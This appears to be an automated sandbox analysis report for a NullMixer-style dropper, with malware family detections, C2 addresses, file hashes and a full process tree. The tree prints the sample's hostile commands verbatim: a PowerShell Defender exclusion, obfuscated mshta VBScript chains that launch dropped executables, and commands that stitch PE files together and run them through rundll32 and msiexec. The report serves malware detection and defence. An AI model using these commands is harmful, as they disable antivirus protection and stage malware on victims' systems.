Analysis Overview
SHA256
46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308
Threat Level: Known bad
The file 46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe was found to be: Known bad.
Malicious Activity Summary
PrivateLoader
SectopRAT
RedLine
Fabookie family
Socelars payload
RedLine payload
Fabookie
Socelars
NullMixer
Sectoprat family
Socelars family
Privateloader family
SectopRAT payload
Onlylogger family
Nullmixer family
Gcleaner family
GCleaner
Redline family
Detect Fabookie payload
OnlyLogger
OnlyLogger payload
Command and Scripting Interpreter: PowerShell
ASPack v2.12-2.42
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Looks up external IP address via web service
Drops Chrome extension
Looks up geolocation information via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Browser Information Discovery
System Location Discovery: System Language Discovery
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-24 21:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-24 21:35
Reported
2024-11-24 21:37
Platform
win7-20240903-en
Max time kernel
5s
Max time network
121s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe | N/A |
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2050293ea5.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe
"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ee0a6fe195bd09.exe
Fri20ee0a6fe195bd09.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2050293ea5.exe
Fri2050293ea5.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209d5bfbb2.exe
Fri209d5bfbb2.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20109b9e174d0fc.exe
Fri20109b9e174d0fc.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20e095683c2b3a0c.exe
Fri20e095683c2b3a0c.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2002ce5f91c761.exe
Fri2002ce5f91c761.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe
Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe
Fri20ba391d4469.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209f6924af86d795.exe
Fri209f6924af86d795.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe
Fri20d5530575e8aa3ed.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20c0c46650eeb2a.exe
Fri20c0c46650eeb2a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe
Fri208f5f140853548.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri200ae385720d3.exe
Fri200ae385720d3.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2060ea1c5d8fae8aa.exe
Fri2060ea1c5d8fae8aa.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 272
C:\Users\Admin\AppData\Local\Temp\is-71TVF.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-71TVF.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$301C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$401C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF ""=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Fri208f5f140853548.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe
EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /IM "Fri20ba391d4469.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 "=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 480
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct( "WscRiPt.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT +lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT+lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"
C:\Windows\SysWOW64\msiexec.exe
msiexec /Y .\6~iPCLZ.rJ
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | ppp-gl.biz | udp |
| US | 104.155.138.21:80 | ppp-gl.biz | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 104.155.138.21:80 | ppp-gl.biz | tcp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 104.155.138.21:80 | ppp-gl.biz | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | ppp-gl.biz | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 88.221.134.83:80 | crl.microsoft.com | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| N/A | 127.0.0.1:49295 | tcp | |
| N/A | 127.0.0.1:49297 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 8f86dedab3baf5ffaaebb8a77d417737 |
| SHA1 | 2469e1057b3a544402d57a602a916b0663a8ff8c |
| SHA256 | b25679ef641f0a807ef8200eb0ec464680dfdfff23b42bad85099b140c5d5630 |
| SHA512 | 2f70caeb89da15a3b1222b52cf49b09af61937b1bf92b5c0baad4d222a9c02f30e174cc9bd8078531fac26213fb990ab1cac78b13f38e7cbc75389685b0ec61c |
\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
| MD5 | 789258af8927e9426e113f79a5c2ebcf |
| SHA1 | 6c64f717f5fc68e602760fefbc2221fd35fd7530 |
| SHA256 | f17e3e76cebd7d97c927151c727d210dca439be0142db2db5a0ccc70d95b9923 |
| SHA512 | 20cbd892411768fd4774fcb9f47f4eff754687808e58af8597714030e0705b53072b0128b8c32f5254836664276b242f8327427d0d6975cdfe6c3a90f4945ec3 |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/3008-69-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/3008-72-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/3008-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3008-83-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3008-89-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3008-88-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3008-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3008-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3008-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3008-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3008-82-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3008-81-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20109b9e174d0fc.exe
| MD5 | 37a1c118196892aa451573a142ea05d5 |
| SHA1 | 4144c1a571a585fef847da516be8d89da4c8771e |
| SHA256 | a3befd523e1e2f4e6f8fce281963f5efb85fe54d85ba67746cc58823d479e92a |
| SHA512 | aac6321582dac5d82cbdb197c20370df3436cf884bea44cbc6d156fd6c4fa99340a3fa866862b83fb0866b31a1e4ebdd73c462972beeb299d4af95592c1d94db |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ee0a6fe195bd09.exe
| MD5 | 06ee576f9fdc477c6a91f27e56339792 |
| SHA1 | 4302b67c8546d128f3e0ab830df53652f36f4bb0 |
| SHA256 | 035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8 |
| SHA512 | e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616 |
